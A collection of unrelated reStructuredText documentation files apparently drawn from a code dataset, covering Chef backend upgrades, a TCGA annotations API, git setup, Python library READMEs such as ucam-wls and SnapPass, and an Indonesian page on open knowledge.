We don't want the cluster to fail over to a follower that is in the
process of being upgraded. So we start by disabling failover
#. Run ``chef-backend-ctl set-cluster-failover off``
Step 2: Upgrade the followers.
-----------------------------------------------------
Followers should be upgraded sequentially. Upgrading them simultaneously is not supported and may result in data loss. Verify the successful rejoin after each upgrade.
#. Install the new chef-backend package
* In RedHat/CentOS: ``yum install PATH_TO_RPM``
* In Debian/Ubuntu: ``dpkg -i PATH_TO_DEB``
You may also want to look at the chef-ingredient cookbook to automate
downloading and installing the latest package.
#. Run the upgrade command
.. code-block:: bash
% chef-backend-ctl upgrade
The upgrade command will make any changes necessary to start the new service and verify that the upgraded node has rejoined the cluster.
Repeat the previous steps in this section for each remaining follower.
Step 3: Upgrade the leader
------------------------------------------------------------
#. Unblock failover, trigger failover, block it again.
.. code-block:: bash
% chef-backend-ctl set-cluster-failover on
% chef-backend-ctl upgrade --failover
% chef-backend-ctl set-cluster-failover off
Step 4: Re-enable failover
-----------------------------------------------------
Allow failover again:
.. code-block:: bash
% chef-backend-ctl set-cluster-failover on
Step 5: Verify the cluster is stable
-----------------------------------------------------
Check the status of the cluster:
.. code-block:: bash
% chef-backend-ctl status
| 34.483871 | 396 | 0.652198 |
5d1702265c20fcf08de2aab998f973a66f6a6325 | 3,786 | rst | reStructuredText | docs/source/sections/progapi/progapi3_tcga/samples_annotations.rst | kabdilleh1/readthedocs | 1f3a070860be552b76002ead610b8f397eeba0e3 | [
"Apache-2.0"
] | null | null | null | docs/source/sections/progapi/progapi3_tcga/samples_annotations.rst | kabdilleh1/readthedocs | 1f3a070860be552b76002ead610b8f397eeba0e3 | [
"Apache-2.0"
] | null | null | null | docs/source/sections/progapi/progapi3_tcga/samples_annotations.rst | kabdilleh1/readthedocs | 1f3a070860be552b76002ead610b8f397eeba0e3 | [
"Apache-2.0"
] | null | null | null | samples().annotations()
########################
Returns TCGA annotations about a specific sample, Takes a sample barcode (of length 16, *eg* TCGA-01-0628-11A) as a required parameter. User does not need to be authenticated.
**Example**::
curl https://api-dot-isb-cgc.appspot.com/_ah/api/isb_cgc_tcga_api/v3/samples/TCGA-01-0628-11A/annotations
**API explorer example**:
Click `here <https://apis-explorer.appspot.com/apis-explorer/?base=https://api-dot-isb-cgc.appspot.com/_ah/api#p/isb_cgc_tcga_api/v3/isb_cgc_tcga_api.samples.annotations?sample_barcode=TCGA-01-0628-11A&/>`_ to see this endpoint in Google's API explorer.
**Python API Client Example**::
from googleapiclient.discovery import build
import httplib2
def get_unauthorized_service():
api = 'isb_cgc_tcga_api'
version = 'v3'
site = 'https://api-dot-isb-cgc.appspot.com'
discovery_url = '%s/_ah/api/discovery/v1/apis/%s/%s/rest' % (site, api, version)
return build(api, version, discoveryServiceUrl=discovery_url, http=httplib2.Http())
service = get_unauthorized_service()
data = service.samples().annotations(sample_barcode='TCGA-01-0628-11A').execute()
**Request**
HTTP request::
GET https://api-dot-isb-cgc.appspot.com/_ah/api/isb_cgc_tcga_api/v3/samples/{sample_barcode}/annotations
**Parameters**
.. csv-table::
:header: "**Parameter name**", "**Value**", "**Description**"
:widths: 50, 10, 50
entity_type,string,"Optional. "
sample_barcode,string,"Required. "
**Response**
If successful, this method returns a response body with the following structure:
.. code-block:: javascript
{
"count": integer,
"items": [
{
"aliquot_barcode": string,
"annotation_gdc_id": string,
"annotation_submitter_id": string,
"case_barcode": string,
"case_gdc_id": string,
"category": string,
"classification": string,
"endpoint_type": string,
"entity_barcode": string,
"entity_gdc_id": string,
"entity_type": string,
"notes": string,
"program_name": string,
"project_short_name": string,
"sample_barcode": string,
"status": string
}
]
}
.. csv-table::
:header: "**Parameter name**", "**Value**", "**Description**"
:widths: 50, 10, 50
count, integer, "Number of annotations returned."
items[], list, "List of annotation items."
items[].aliquot_barcode, string, "Aliquot barcode."
items[].annotation_gdc_id, string, "Id assigned by the GDC to the annotation"
items[].annotation_submitter_id, string, "Id assigned to the annotation by the TCGA"
items[].case_barcode, string, "Case barcode."
items[].case_gdc_id, string, "Id assigned by the GDC to the case"
items[].category, string, "Annotation category name, e.g. 'Acceptable treatment for TCGA tumor'."
items[].classification, string, "Annotation classification, .e.g 'CenterNotification', 'Notification', 'Observation', or 'Redaction'."
items[].endpoint_type, string, "Which type of GDC Annotation API was used, either legacy or current "
items[].entity_barcode, string, "The TCGA barcode that the annottion is associated with"
items[].entity_gdc_id, string, "Id assigned by the GDC to the entity"
items[].entity_type, string, "Entity type, e.g. 'Case', 'Aliquot', 'Analyte', 'Portion'', 'Slide', or 'Sample'."
items[].notes, string, "Notes on the annotation"
items[].program_name, string, "The program name, e.g. 'TCGA' (the only program with annotations)"
items[].project_short_name, string, "The project id, e.g. 'TCGA-BRCA', 'TCGA-OV'."
items[].sample_barcode, string, "Sample barcode."
items[].status, string, "Status of the annotation, e.g. 'Approved', 'Rescinded'"
| 39.030928 | 254 | 0.679345 |
874db6c74b1f8b1f1d38974d0f0f32d258e5519b | 1,461 | rst | reStructuredText | includes_chef_repo/includes_chef_repo_git_master_setup.rst | jblaine/chef-docs | dc540f7bbc2d3eedb05a74f34b1caf25f1a5d7d3 | [
"CC-BY-3.0"
] | null | null | null | includes_chef_repo/includes_chef_repo_git_master_setup.rst | jblaine/chef-docs | dc540f7bbc2d3eedb05a74f34b1caf25f1a5d7d3 | [
"CC-BY-3.0"
] | 1 | 2021-06-27T17:03:16.000Z | 2021-06-27T17:03:16.000Z | includes_chef_repo/includes_chef_repo_git_master_setup.rst | jblaine/chef-docs | dc540f7bbc2d3eedb05a74f34b1caf25f1a5d7d3 | [
"CC-BY-3.0"
] | null | null | null | .. The contents of this file may be included in multiple topics (using the includes directive).
.. The contents of this file should be modified in a way that preserves its ability to appear in multiple topics.
Use the following steps to set up a development repository for |chef|:
#. Setup a |github| account.
#. Fork the https://github.com/opscode/chef repository to your |github| account.
#. Clone the https://github.com/opscode/chef repository:
.. code-block:: bash
$ git clone git@github.com:yourgithubusername/chef.git
#. From the command line, browse to the ``chef/`` directory:
.. code-block:: bash
$ cd chef/
#. From the ``chef/`` directory, add a remote named ``chef``:
.. code-block:: bash
$ git remote add opscode git://github.com/chef/chef.git
#. Verify:
.. code-block:: bash
$ git config --get-regexp "^remote\.chef"
which should return something like:
.. code-block:: bash
remote.chef.url git://github.com/chef/chef.git
remote.chef.fetch +refs/heads/*:refs/remotes/chef/*
#. Adjust your branch to track the ``opscode master`` remote branch:
.. code-block:: bash
$ git config --get-regexp "^branch\.master"
which should return something like:
.. code-block:: bash
branch.master.remote origin
branch.master.merge refs/heads/master
and then change it:
.. code-block:: bash
$ git config branch.master.remote chef
| 24.762712 | 113 | 0.666667 |
091f2c02ac2f920b5e8155968517445aae4fe900 | 6,842 | rst | reStructuredText | README.rst | edwinbalani/ucam-wls | 1c828c1b9cbf4e6b38fb1986235e20a746726f6a | [
"MIT"
] | null | null | null | README.rst | edwinbalani/ucam-wls | 1c828c1b9cbf4e6b38fb1986235e20a746726f6a | [
"MIT"
] | 3 | 2020-11-20T18:36:11.000Z | 2020-12-03T00:55:56.000Z | README.rst | edwinbalani/ucam-wls | 1c828c1b9cbf4e6b38fb1986235e20a746726f6a | [
"MIT"
] | null | null | null | ============================================
ucam-wls: a Raven-like login service library
============================================
`Documentation <https://eb677.user.srcf.net/ucam_wls/>`_ [WIP] |
`PyPI <https://pypi.org/project/ucam-wls/>`_ |
`GitHub <https://github.com/edwinbalani/ucam-wls>`_
``ucam-wls`` is a Python library to implement the *web login service* (WLS)
component of the 'Ucam-WebAuth' (or 'WAA2WLS') protocol, which is used
primarily at the University of Cambridge as part of the `Raven authentication
service`_.
-------------------------------------------------------------------------------
Introduction
------------
There are many implementations of the 'web authentication agent' (WAA) part of
Ucam-WebAuth. These are run by the party that is requesting a user's identity,
and they exist already for various platforms, applications and languages.
Examples include:
- the officially-supported `mod_ucam_webauth`_ module for Apache Web Server,
which is very popular (at least within Cambridge University)
- `ucam-webauth-php`_, also published by the University but "not (officially)
supported"
- Daniel Richman's `python-ucam-webauth`_
- `django-ucamwebauth`_, which is written and maintained by a team within the
University
(More are listed on the `Raven project page`_.)
However, no known implementations of the WLS component (which authenticates
users against known credentials) exist, apart from the official Raven
`production`_ and `test/demo`_ servers.
``ucam-wls`` is a first attempt at a solution for developing your own WLS. It
is intended to be easily integrated into a custom or in-house application to
provide the full authentication service.
.. _Ucam-WebAuth: https://raven.cam.ac.uk/project/waa2wls-protocol.txt
.. _Raven authentication service: https://raven.cam.ac.uk/
.. _Raven project page: https://raven.cam.ac.uk/project/
.. _mod_ucam_webauth: https://github.com/cambridgeuniversity/mod_ucam_webauth
.. _ucam-webauth-php: https://github.com/cambridgeuniversity/ucam-webauth-php
.. _python-ucam-webauth: https://github.com/DanielRichman/python-ucam-webauth
.. _django-ucamwebauth: https://github.com/uisautomation/django-ucamwebauth
.. _production: https://raven.cam.ac.uk/
.. _test/demo: https://demo.raven.cam.ac.uk/
Potential applications
----------------------
An **internal single sign-on** service:
- Useful for systems with in-house user account bases: internal webapps avoid
reinventing the wheel by using battle-tested WAA implementations.
- Easier to develop an internal login system in this way: half the work (the
WAA side) is already done.
- Internal webapps no longer need to roll their own authentication
systems/databases, and access to passwords can be kept in a centralised
location.
- *Sounds a lot like the Raven service*, but webapps can authenticate against
an entirely different user database.
**Two-headed** login service:
- Users can authenticate using either locally-administered credentials, or by
being 'referred' to Raven (where the WLS redirects the client browser to
Raven using the same request parameters).
- Integrates authentication of local guest, external or special (e.g.
administrator) accounts with that of mainstream Raven users, creating
a unified login process regardless of the 'source' of the user's identity.
- Similar to local *vs.* Raven login options on many websites and CMSes, but
can be managed institution-wide rather than having to maintain decoupled sets
of passwords on each installation of WordPress, Drupal, *etc.*
The above two use-cases essentially offer the same benefits that Raven does,
but with the added advantage that users don't need a Raven account to benefit
(*e.g.* guests, external researchers, former staff/alumni). Alternatively, if
they do have a Raven account, they can be given the option of using Raven or
local credentials.
The next use-case is different...
**Stricter authentication requirements** than what Raven provides:
- Useful for sensitive applications
- Require both a username/password (possibly from either Raven or local
credentials; see above) as well as multi-factor authentication methods such
as a one-time password (OTP).
- OTP secrets can be kept and managed centrally; the webapp never sees them or
the OTP responses.
Example WLS implementation
--------------------------
A simple implementation of a WLS using this library, and similar in nature to
the `Raven demo server`_, is available in the `wls-demo`_ repository.
.. _Raven demo server: https://demo.raven.cam.ac.uk/
.. _wls-demo: https://github.com/edwinbalani/wls-demo
Contributing
------------
There is a long **to-do list** on this project. It includes:
* Writing unit tests
* Improving API documentation
If you are keen to help out on any of the above (or indeed anything else), then
please fork, commit and submit a pull request! Maybe `get in touch
<git+ucam-wls@balani.xyz>`_ too :)
A warning
---------
``ucam-wls`` is currently **alpha quality software**. It has not been tested
heavily (yet), so no guarantees can be made regarding its security or
robustness.
For example, while the library attempts to make *some* checks on input
arguments (regarding types, values, validity *etc.*), it is still definitely
possible to produce bogus responses that will confuse WAAs. (However,
``ucam-wls`` is a library, and there is some level of expectation that
application developers will interface with it properly!)
What this library does and doesn't do
-------------------------------------
``ucam-wls`` is a *library*, not a complete solution. Accordingly, it will:
* Provide a high-level interface to a protocol-compliant implementation of a
WLS.
* Accept authentication requests as URL query strings, a Python dictionary of
parameters, or as keyword arguments to a class constructor function.
* Generate signed authentication responses with the appropriate status code,
using a provided RSA private key.
But ``ucam-wls`` won't:
* Run a fully-blown authentication server that checks usernames/passwords.
* Serve a web interface for users to authenticate. (See `wls-demo`_ for an
example of this.)
* Manage your RSA private keys for you.
Links
-----
- `WAA2WLS protocol definition <https://github.com/cambridgeuniversity/UcamWebauth-protocol/blob/master/waa2wls-protocol.txt>`_
- `Raven project pages <https://raven.cam.ac.uk/project/>`_
- `Raven wiki <https://wiki.cam.ac.uk/raven/>`_. Contains lots of newer
information on Raven support, WAA implementations, *etc.*
Credits and copyright
---------------------
``ucam-wls`` is authored by `Edwin Balani <https://github.com/edwinbalani/>`_,
and released under the terms of the MIT License.
The Ucam-WebAuth/WAA2WLS protocol was designed by `Jon Warbrick
<http://people.ds.cam.ac.uk/jw35/>`_.
| 39.321839 | 127 | 0.734727 |
3649ca607aaa2e20ef191fe62bb860e27fb98ec8 | 1,831 | rst | reStructuredText | docs/response.rst | yunstanford/transmute-core | a8e5dd055f0f3d39327d71dd61bf0ee147f59ebe | [
"MIT"
] | 42 | 2016-06-04T00:16:16.000Z | 2021-06-11T02:09:31.000Z | docs/response.rst | yunstanford/transmute-core | a8e5dd055f0f3d39327d71dd61bf0ee147f59ebe | [
"MIT"
] | 55 | 2016-06-11T13:58:46.000Z | 2021-12-21T06:29:20.000Z | docs/response.rst | yunstanford/transmute-core | a8e5dd055f0f3d39327d71dd61bf0ee147f59ebe | [
"MIT"
] | 18 | 2016-05-18T20:50:53.000Z | 2021-11-18T09:09:59.000Z | ========
Response
========
--------------
Response Shape
--------------
The response shape describes what sort of object is returned back by the HTTP
response in cases of success.
Simple Shape
============
As of transmute-core 0.4.0, the default response shape is simply the
object itself, serialized to the primitive content type. e.g.
.. code-block:: python
from transmute_core import annotate
from schematics.models import Model
from schematics.types import StringType, IntType
class MyModel(Model):
foo = StringType()
bar = IntType()
@annotate("return": MyModel)
def return_mymodel():
return MyModel({
"foo": "foo",
"bar": 3
})
Would return the response
.. code-block:: json
{
"foo": "foo",
"bar": 3
}
Complex Shape
=============
Another common return shape is a nested object, contained inside a layer
with details about the response:
.. code-block:: json
{
"code": 200,
"success": true,
"result": {
"foo": "foo",
"bar": 3
}
}
This can be enabled by modifying the default context, or passing a
custom one into your function:
.. code-block:: python
from transmute_core import (
default_context, ResponseShapeComplex,
TransmuteContext
)
# modifying the global context, which should be done
# before any transmute functions are called.
default_context.response_shape = ResponseShapeComplex
# passing in a custom context
context = TransmuteContext(response_shape=ResponseShapeComplex)
transmute_route(app, fn, context=context)
Custom Shapes
=============
Any class or object which implements :class:`transmute_core.response_shape.ResponseShape`
can be used as an argument to response_shape.
| 21.541176 | 89 | 0.639541 |
38785051f943655b72ba577ac4e4b1cc5bf8dd1d | 981 | rst | reStructuredText | examples/galh_test/README.rst | decaelus/vplanet | f59bd59027f725cc12a2115e8d5df58784c53477 | [
"MIT"
] | null | null | null | examples/galh_test/README.rst | decaelus/vplanet | f59bd59027f725cc12a2115e8d5df58784c53477 | [
"MIT"
] | null | null | null | examples/galh_test/README.rst | decaelus/vplanet | f59bd59027f725cc12a2115e8d5df58784c53477 | [
"MIT"
] | null | null | null | Galactic Habitat
================
Overview
--------
=================== ============
**Date** 07/25/18
**Author** Russell Deitrick
**Modules** `galhabit <../src/galhabit.html>`_
**Approx. runtime** | 183 seconds (:code:`vpl.in`)
| 175 seconds (:code:`tides_only/vpl.in`)
**Source code** `GitHub <https://github.com/VirtualPlanetaryLaboratory/vplanet-private/tree/master/examples/galhabit>`_
=================== ============
.. todo:: **@deitrr**: Description needed for the **galh_test** example.
To run this example
-------------------
.. code-block:: bash
# Run the main example
vplanet vpl.in
# Run the `tides_only` example
cd tides_only
vplanet vpl.in
cd ..
# Plot the figure
python plotgalh.py
Expected output
---------------
.. todo:: **@deitrr**: Caption needed for the **galh_test** example figure.
.. figure:: galh_test.png
:width: 600px
:align: center
| 22.295455 | 125 | 0.542304 |
8cf5494f9f8544e7e7653a5f21f1c843476b34f1 | 305 | rst | reStructuredText | product_price_factor/README.rst | factorlibre/website-addons | 9a0c7a238e2b6030d57f7a08d48816b4f2431524 | [
"MIT"
] | 1 | 2020-03-01T03:04:21.000Z | 2020-03-01T03:04:21.000Z | product_price_factor/README.rst | factorlibre/website-addons | 9a0c7a238e2b6030d57f7a08d48816b4f2431524 | [
"MIT"
] | null | null | null | product_price_factor/README.rst | factorlibre/website-addons | 9a0c7a238e2b6030d57f7a08d48816b4f2431524 | [
"MIT"
] | null | null | null | Product price factor
====================
Description: https://apps.odoo.com/apps/modules/11.0/product_price_factor/
Maintainers
-----------
* `IT-Projects LLC <https://it-projects.info>`__
This module is not maintained since Odoo 13.0
Tested on Odoo 11.0 51a9f30e1971155b6315c6bd888d56048191bddd
| 23.461538 | 74 | 0.708197 |
201c9a2f288c43391c95dec3ba7855bc5961fe2f | 461 | rst | reStructuredText | specific/vlc/README.rst | fishilico/home-files | f508eccae5c1a2082a92108380258daae3e7f59b | [
"CNRI-Python"
] | 19 | 2016-05-25T19:29:31.000Z | 2021-06-16T13:13:33.000Z | specific/vlc/README.rst | fishilico/home-files | f508eccae5c1a2082a92108380258daae3e7f59b | [
"CNRI-Python"
] | 1 | 2019-02-22T20:18:05.000Z | 2019-02-22T20:58:23.000Z | specific/vlc/README.rst | fishilico/home-files | f508eccae5c1a2082a92108380258daae3e7f59b | [
"CNRI-Python"
] | 4 | 2020-01-23T11:18:50.000Z | 2021-10-31T13:05:07.000Z | Youtube playlist addon
======================
A fresh install of VLC can read youtube videos but not playlists. This feature
can be added thanks to a Lua script to be copied in
``~/.local/share/vlc/lua/playlist/youtube_playlist.lua``.
On Windows the path is ``%APPDATA%\vlc\lua\playlist\``.
* Addon website: http://addons.videolan.org/content/show.php/?content=149909
* Lua script: http://addons.videolan.org/CONTENT/content-files/149909-playlist_youtube.lua
| 41.909091 | 90 | 0.737527 |
2598355f3d6edb7ed91200fb2985359ec6efa470 | 6,099 | rst | reStructuredText | README.rst | mdelecate/snappass | 7bf2d529813949bd15bb1b215df3202aebd6d218 | [
"MIT"
] | null | null | null | README.rst | mdelecate/snappass | 7bf2d529813949bd15bb1b215df3202aebd6d218 | [
"MIT"
] | null | null | null | README.rst | mdelecate/snappass | 7bf2d529813949bd15bb1b215df3202aebd6d218 | [
"MIT"
] | null | null | null | Fork Notes
--------
Forked the original from pinterest/snappass in order to fix an issue with the shareable token links, as all URLs not pointing to the base domain lead to a "500 Internal Server Error" page when deployed via cPanel's Application Manager (which uses Passenger).
This fork fixes this by inserting the token into the URL as a query string, which fixes the issue.
Installation on WHM + cPanel + Apache
--------
1. On cPanel, open Files -> Git Version Control -> Create
2. Create a Repository with these settings:
Clone a Repository: ON
Clone URL: https://github.com/mdelecate/snappass.git
Repository Path: public_html/snappass/repo
Repository Name: SnapPass
Click Create
3. Open Software -> Application Manager -> Register Application
4. Deploy the following Application:
Application Name: SnapPass
Deployment Domain: Pick your preferred domain
Base Application URL: /
Application Path: public_html/snappass/repo/snappass
Deployment Environment: Production
Environment Variables -> Add Variable:
Variable Name: SECRET_KEY
Value: Input a random string characters (use a long string created by a random key/password generator)
Click Deploy
5. In the Application Manager, for the new SnapPass app, click "Ensure dependencies" to install all required software.
Done! Your app is now available on your preferred domain.
If there are problems, toggle Deployment Environment to Development to increase your chance of seeing helpful error messages.
It's strongly recommended to use a domain with an SSL certificate. WHM makes this easy with AutoSSL and Let's Encrypt.
It's strongly recommended to force a secure connection by going to cPanel -> Domains -> Force HTTPS Redirect.
/Fork Notes
-----------------
========
SnapPass
========
|pypi| |build|
.. |pypi| image:: https://img.shields.io/pypi/v/snappass.svg
:target: https://pypi.python.org/pypi/snappass
:alt: Latest version released on PyPI
.. |build| image:: https://travis-ci.org/pinterest/snappass.svg
:target: https://travis-ci.org/pinterest/snappass
:alt: Build status
It's like SnapChat... for passwords.
This is a web app that lets you share passwords securely.
Let's say you have a password. You want to give it to your coworker, Jane.
You could email it to her, but then it's in her email, which might be backed up,
and probably is in some storage device controlled by the NSA.
You could send it to her over chat, but chances are Jane logs all her messages
because she uses Google Hangouts Chat, and Google Hangouts Chat might log everything.
You could write it down, but you can't find a pen, and there's way too many
characters because your security person, Paul, is paranoid.
So we built SnapPass. It's not that complicated, it does one thing. If
Jane gets a link to the password and never looks at it, the password goes away.
If the NSA gets a hold of the link, and they look at the password... well they
have the password. Also, Jane can't get the password, but now Jane knows that
not only is someone looking in her email, they are clicking on links.
Anyway, this took us very little time to write, but we figure we'd save you the
trouble of writing it yourself, because maybe you are busy and have other things
to do. Enjoy.
Security
--------
Passwords are encrypted using `Fernet`_ symmetric encryption, from the `cryptography`_ library.
A random unique key is generated for each password, and is never stored;
it is rather sent as part of the password link.
This means that even if someone has access to the Redis store, the passwords are still safe.
.. _Fernet: https://cryptography.io/en/latest/fernet/
.. _cryptography: https://cryptography.io/en/latest/
Requirements
------------
* Redis
* Python 2.7+ or 3.4+ (both included)
Installation
------------
::
$ pip install snappass
$ snappass
* Running on http://0.0.0.0:5000/
* Restarting with reloader
Configuration
-------------
You can configure the following via environment variables.
``SECRET_KEY``: unique key that's used to sign key. This should
be kept secret. See the `Flask Documentation`__ for more information.
.. __: http://flask.pocoo.org/docs/quickstart/#sessions
``DEBUG``: to run Flask web server in debug mode. See the `Flask Documentation`__ for more information.
.. __: http://flask.pocoo.org/docs/quickstart/#debug-mode
``STATIC_URL``: this should be the location of your static assets. You might not
need to change this.
``NO_SSL``: if you are not using SSL.
``URL_PREFIX``: useful when running snappass behind a reverse proxy like `nginx`. Example: ``"/some/path/"``, Defaults to ``None``
``REDIS_HOST``: this should be set by Redis, but you can override it if you want. Defaults to ``"localhost"``
``REDIS_PORT``: is the port redis is serving on, defaults to 6379
``SNAPPASS_REDIS_DB``: is the database that you want to use on this redis server. Defaults to db 0
``REDIS_URL``: (optional) will be used instead of ``REDIS_HOST``, ``REDIS_PORT``, and ``SNAPPASS_REDIS_DB`` to configure the Redis client object. For example: redis://username:password@localhost:6379/0
``REDIS_PREFIX``: (optional, defaults to ``"snappass"``) prefix used on redis keys to prevent collisions with other potential clients
Docker
------
Alternatively, you can use `Docker`_ and `Docker Compose`_ to install and run SnapPass:
.. _Docker: https://www.docker.com/
.. _Docker Compose: https://docs.docker.com/compose/
::
$ docker-compose up -d
This will pull all dependencies, i.e. Redis and appropriate Python version (3.7), then start up SnapPass and Redis server. SnapPass server is accessible at: http://localhost:5000
Similar Tools
-------------
- `Snappass.NET <https://github.com/generateui/Snappass.NET>`_ is a .NET
(ASP.NET Core) port of SnapPass.
We're Hiring!
-------------
Are you really excited about open-source and great software engineering?
`Pinterest is hiring <https://careers.pinterest.com>`_!
| 36.303571 | 259 | 0.723889 |
f6bb267a93f7575e6f0cca9abcd910f47621753e | 6,723 | rst | reStructuredText | kekuatan_gerakan.rst | suryadalimunthe/sainsterbuka | b21bf1e366f7d797bc014705050014bc44dc2fef | [
"CC0-1.0"
] | null | null | null | kekuatan_gerakan.rst | suryadalimunthe/sainsterbuka | b21bf1e366f7d797bc014705050014bc44dc2fef | [
"CC0-1.0"
] | null | null | null | kekuatan_gerakan.rst | suryadalimunthe/sainsterbuka | b21bf1e366f7d797bc014705050014bc44dc2fef | [
"CC0-1.0"
] | 1 | 2018-08-14T09:11:25.000Z | 2018-08-14T09:11:25.000Z | 6. Kekuatan Gerakan
========================
Bagian strategi ini akan menggambarkan beberapa kekuatan gerakan atau komunitas Pengetahuan Terbuka.
**Struktur organisasi dan dampak kolektif**
* Komunitas ilmiah global sangat luas, meliputi setiap benua, dan tertanam dalam penelitian dan lembaga akademis. Gerakan 'Terbuka' lebih dari hanya sekedar pengetahuan, tapi terkait dengan bidang yang lebih luas seperti Open Culture, Open Government, Open Source, dan Open Society. Oleh karena itu, potensi dampak kolektif yang dapat dimiliki oleh gerakan itu sangat besar, dengan konsekuensi bagi masyarakat global; misalnya, mempengaruhi [UN Sustainable Development Goals](http://www.unfoundation.org/features/globalgoals/the-global-goals.html).
\
*see [UN Sustainable Development Goals](https://www.un.org/sustainabledevelopment/sustainable-development-goals/) website*
* Aktivis Pengetahuan terbuka sebagai bagian dari gerakan terbuka sangat diuntungkan dengan kolaborasi silang beberapa sektor berbeda. Contohnya, sekarang Pengetahuan Terbuka adalh gerbang Pendidikan Terbuka, tapi memiliki kebijakan lebih kuat dari gerakan SUmber TErbuka.
* **Beragam partisipasi dari individu yang bersemangat**
* Keberhasilan signifikan dalam pengetahuan terbuka sering dikaitkan dengan para pejuang yang tekun dan gigih, terutama di arena kebijakan dan advokasi / adopsi. Individu-individu ini menunjukkan kemampuan yang luar biasa untuk mencapai perubahan substansial, dan menciptakan pengaruh kuat, hampir sendirian. Sebagai aset bagi gerakan, mereka menjadi sangat penting ketika pengalaman dan pengetahuan mereka dapat dibagi dan dikalikan, melalui kolaborasi, jaringan dan komunitas, serta model bimbingan.
* **Kekuatan penelitian dan bukti mendukung praktik pengetahuan terbuka**
* Ada peningkatan dukungan terhadap semua aspek Pengetahuan Terbuka. Ringkasan penting dari hal ini termasuk [McKiernan et al., (2016)](https://elifesciences.org/articles/16800) dan [Tennant et al., (2016)](https://f1000research.com/articles/5-632/v3). Dampaknya dapat terlihat di berbagai tingkatan, dari praktik individu, sampai kebijakan tingkat nasional tentang Akses Terbuka dan Sains Terbuka.
* Proyek-proyek penting, kelompok, dan para sarjana telah melakukan penelitian ke berbagai aspek pengetahuan terbuka dan dampaknya, mereka menjadi sangat positif. Ketika gerakan berkembang, bukti, dan kedalaman analisis kritis terus berkembang.
* **Luasnya kreativitas menghasilkan solusi teknis dan sosioteknik**
* Misalnya, jalur hijau dan emas akses terbuka (Open Access). Yang dulu berkaitan dengan pengarsipan sendiri, dan selanjutnya untuk dipublikasikan dalam jurnal akses terbuka. Sementara beberapa variasi telah ada, model ini umumnya melampaui perbedaan geografis, institusional, atau sektoral.
* Pertumbuhan dan pengadopsian pracetak sebagai metode untuk mendapatkan penelitian lebih cepat dan lebih transparan. In the last two years, this has led to a rapidly evolving [landscape](https://doi.org/10.31222/osf.io/796tu) around preprints, with technological innovation and community practices constantly adapting.
* **Ketersediaan banyak piagam dan deklarasi Pengetahuan Terbuka**
* Sekarang semakin banyak yang mendukung keterbukaan (typically [Open Access](http://oad.simmons.edu/oadwiki/Declarations_in_support_of_OA)), juga [more broadly](http://tinyurl.com/scholcomm-charters), penawaran tujuan dan aksi yang menghasilkan banyak pemikiran dan diskusi.
* **Dorongan yang kuat untuk mengembangkan model kebijakan**
Dinamis, luas dan perpaduan atas-bawah (inisiatif kebijakan dari pendana, pemerintah, lembaga) dan pendekatan dari bawah (akar rumput). Tetap penting bahwa agenda untuk pengetahuan terbuka tetap diakui di tingkat politik tertinggi. Komite Ilmu Pengetahuan dan Teknologi Inggris dalam hal integritas penelitian adalah contoh yang sangat baik dari ini [Committee into research integrity](https://www.parliament.uk/business/committees/committees-a-z/commons-select/science-and-technology-committee/news-parliament-2017/research-integrity3-evidence-17-19/).
Salah satu masalah dengan kebijakan top-down adalah badan-badan seperti pemerintah dan pemberi dana menuntut para peneliti untuk mematuhi aturan tentang pembagian data, kode terbuka, dan sejenisnya, namun tidak selalu menyediakan sumber daya atau struktur yang diperlukan. Kebijakan bottom-up bersama-sama menjalankan praktik terbaik dari komunitas penelitian ilmiah yang ada dan, dibandingkan dengan pendekatan top-down, lebih sering bersifat sukarela daripada wajib. Mengevaluasi tingkat keselarasan antara kebijakan top-down dan bottom-up dapat membantu mengilustrasikan bagaimana kedua pendekatan dapat lebih mengakomodasi dan mempromosikan Pengetahuan Terbuka.
* **Keragaman tujuan memungkinkan kemajuan di banyak barisan secara bersamaan.**
* Sebagai contoh, [Scientific Electronic Library Online](http://www.scielo.org/php/index.php?lang=en) (SciELO) telah terbukti berhasil di negara Amerika Latin, Portugal, and Afrika Selatan. Demikian pula, [Africa Journals Online](https://www.ajol.info/) (AJOL) yang sangat terkenal di Afrika.
* Pengetahuan Terbuka telah diakui oleh organisasi internasional yang aktif dalam penelitian dan pendidikan, dan mendapat dukungan kuat dari lembaga di seluruh dunia.
* Pengetahuan Terbuka cenderung menggunakan Bahasa umum (bahasa Inggris) untuk memudahkan pemahaman (walaupun begitu, lihat di bawah untuk tahu mengapa hal ini juga menjadi tantangan).
**Aksesibilitas, ramah pengguna, dan diseminasi**
* Gerakan Pengetahuan Terbuka menerbitkan artikel dan sumber daya yang biasanya gratis, terindeks dengan baik oleh Google dan mesin pencari lainnya, mudah dibaca di perangkat seluler, dan cepat menggunakan grafik dan multimedia untuk mengilustrasikan poin. Hal ini ini membantu gerakan Pengetahuan Terbuka menyebarluaskan gagasannya secara lebih luas dan cepat daripada yang dapat dicapai dengan metode publikasi tradisional.
* Praktik seperti penggunaan platform pemformatan teks, penyediaan struktur dokumen yang dibentuk dengan baik melalui judul yang diberi label dengan jelas, paragraf, dll., dan fungsi alt-texts untuk gambar dan informasi deskriptif untuk grafik, video, dll. tidak hanya membantu membuat informasi yang dapat dibaca oleh mesin dalam penyebaran informasi, tetapi juga membuat informasi ini dapat diakses oleh orang-orang dengan kebutuhan akses ( lihat misalnya pedoman aksesibilitas dasar yang disediakan oleh [UK Home Office Digital] (https://github.com/UKHomeOffice/posters/blob/master/accessibility/dos-donts/posters_en-UK/accessibility-posters-set.pdf)) .
| 122.236364 | 665 | 0.819872 |
d2a39404de0d51389552d614dc7e2153b4306985 | 788 | rst | reStructuredText | README.rst | dkirkby/bossdata | 313b6a69e75679248a2e41f02f88da467835aa45 | [
"MIT"
] | 2 | 2017-06-12T13:18:20.000Z | 2020-04-08T10:00:31.000Z | README.rst | dkirkby/bossdata | 313b6a69e75679248a2e41f02f88da467835aa45 | [
"MIT"
] | 102 | 2015-05-11T20:27:10.000Z | 2019-01-08T16:01:54.000Z | README.rst | dkirkby/bossdata | 313b6a69e75679248a2e41f02f88da467835aa45 | [
"MIT"
] | 4 | 2015-06-18T19:51:46.000Z | 2017-08-31T00:23:18.000Z | ========
bossdata
========
.. image:: https://travis-ci.org/dkirkby/bossdata.svg?branch=master
:target: https://travis-ci.org/dkirkby/bossdata
.. image:: https://img.shields.io/pypi/v/bossdata.svg
:target: https://pypi.python.org/pypi/bossdata
.. image:: https://readthedocs.org/projects/bossdata/badge/?version=latest
:target: http://bossdata.readthedocs.io/en/latest/?badge=latest
:alt: Documentation Status
A python package for working with `spectroscopic data
<http://www.sdss.org/dr12/spectro/spectro_basics/>`_ from the `Sloan Digital
